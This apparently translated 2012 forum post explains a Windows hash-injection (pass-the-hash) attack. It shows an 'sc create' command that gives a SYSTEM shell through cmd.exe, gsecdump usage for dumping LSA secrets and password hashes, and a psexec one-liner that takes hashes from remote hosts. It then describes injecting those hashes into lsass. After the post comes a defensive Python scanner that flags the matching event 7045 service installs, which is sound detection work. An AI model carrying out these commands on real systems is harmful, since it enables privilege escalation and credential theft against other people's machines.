
Hash injection attack

Posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the hashes just grabbed with gsecdump into the local lsass process, which is how the hash injection attack is carried out. Those foreigners really are good; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually never need to have the password cracked at all; this is simply a matter of using the tool. As the original article puts it well, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
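From the defender's side, both actions shown in the post leave a trace on the target: registering cmd.exe as a service, and the service that PsExec installs to run gsecdump remotely, each produce a System-log event 7045 ("A service was installed in the system") record. The scanner below is an added example written for this page, not code from the post or from the truesec article it quotes. It assumes the standard 7045 field layout (Service Name / Service File Name / Service Type / Service Start Type / Service Account), that the helper service PsExec installs is named PSEXESVC (well-known PsExec behaviour, not stated on the page), and it runs over log records constructed for the demo.

```python
"""Flag suspicious Windows service installations from System-log event 7045.

Added example for this page, not code from the original post or from the
truesec blog it quotes. Assumptions: the field layout parsed below is the
message body of event ID 7045; PSEXESVC is the service helper PsExec installs
on the target (well-known behaviour, not stated on the page); the records in
SAMPLE_7045 are constructed for the demo.
"""
import re
from dataclasses import dataclass

# Command interpreters that should never be the image of a service on their
# own: this catches the post's  sc create ... binpath= "cmd.exe /K start".
INTERPRETERS = {"cmd.exe", "command.com", "powershell.exe",
                "wscript.exe", "cscript.exe"}

# Name of the service PsExec drops on the remote host (known PsExec behaviour).
PSEXEC_SERVICE = "PSEXESVC"

FIELD_RE = re.compile(
    r"^(Service Name|Service File Name|Service Type|Service Start Type|"
    r"Service Account):[ \t]*(.*)$",
    re.MULTILINE,
)


@dataclass
class ServiceInstall:
    name: str
    file_name: str      # full command line registered as the service binary
    service_type: str
    start_type: str
    account: str


def parse_7045(message: str) -> ServiceInstall:
    """Pull the named fields out of a 7045 message body."""
    fields = {key: value.strip() for key, value in FIELD_RE.findall(message)}
    return ServiceInstall(
        name=fields.get("Service Name", ""),
        file_name=fields.get("Service File Name", ""),
        service_type=fields.get("Service Type", ""),
        start_type=fields.get("Service Start Type", ""),
        account=fields.get("Service Account", ""),
    )


def image_basename(file_name: str) -> str:
    """Lower-cased executable name from a service command line.

    Handles quoted ("C:\\Program Files\\x\\y.exe" -arg) and unquoted
    (C:\\WINDOWS\\system32\\cmd.exe /K start) forms.
    """
    cmdline = file_name.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        image = cmdline[1:end] if end > 0 else cmdline[1:]
    else:
        image = cmdline.split()[0] if cmdline else ""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(svc: ServiceInstall) -> list[str]:
    """Reasons a service install matches the technique shown in the post."""
    reasons = []
    image = image_basename(svc.file_name)
    if image in INTERPRETERS:
        reasons.append(f"service image is a command interpreter ({image})")
    if re.search(r"\s/[kc]\b", svc.file_name, re.IGNORECASE):
        reasons.append("interpreter switch /K or /C on the service command line")
    if svc.name.upper() == PSEXEC_SERVICE:
        reasons.append("PsExec remote-execution service helper")
    if reasons and svc.account.lower() == "localsystem":
        reasons.append("runs as LocalSystem (NT AUTHORITY\\SYSTEM)")
    return reasons


def scan(messages: list[str]) -> dict[str, list[str]]:
    """Map each flagged service name to its findings; benign installs omitted."""
    findings = {}
    for message in messages:
        svc = parse_7045(message)
        reasons = assess(svc)
        if reasons:
            findings[svc.name] = reasons
    return findings


# Constructed 7045 records modelled on the actions shown in the post,
# plus one benign install (the print spooler) that must not be flagged.
SAMPLE_7045 = [
    "A service was installed in the system.\n\n"
    "Service Name: shellcmdline\n"
    "Service File Name: C:\\WINDOWS\\system32\\cmd.exe /K start\n"
    "Service Type: user mode service\n"
    "Service Start Type: demand start\n"
    "Service Account: LocalSystem",
    "A service was installed in the system.\n\n"
    "Service Name: PSEXESVC\n"
    "Service File Name: %SystemRoot%\\PSEXESVC.exe\n"
    "Service Type: user mode service\n"
    "Service Start Type: demand start\n"
    "Service Account: LocalSystem",
    "A service was installed in the system.\n\n"
    "Service Name: Spooler\n"
    "Service File Name: \"%SystemRoot%\\System32\\spoolsv.exe\"\n"
    "Service Type: user mode service\n"
    "Service Start Type: auto start\n"
    "Service Account: LocalSystem",
]

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_7045).items():
        print(f"ALERT {name}: " + "; ".join(reasons))
```

The check on the service image is the one that matters most here: a service whose binary is a command interpreter is almost never legitimate, and the 7045 record is written even when, as in the post, the start call later "fails" with error 1053 and the service is deleted again.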